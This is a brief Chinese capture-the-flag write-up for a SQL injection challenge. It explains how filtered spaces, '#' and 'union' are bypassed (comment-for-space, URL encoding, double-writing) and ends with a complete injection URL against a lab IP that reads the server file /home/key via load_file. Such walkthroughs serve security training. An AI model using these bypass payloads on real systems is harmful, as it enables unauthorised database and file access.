SQL注入2 进入题目 一眼可见参数id存在注入 该题过滤了’空格’和’#‘俩个符号,这里我用’/**/‘代替空格,’%23’代替’#', 用order by 猜出字段数为4。 这里union也被过滤了,于是双写绕过过滤,2,3,4都为显示位。 直接读文件出key值 http://192.168.100.150:1081/vulnerabilities/fu1.php?id=-1%27)//ununionion//select//1,(select//group_concat(load_file(‘/home/key’))),3,4%23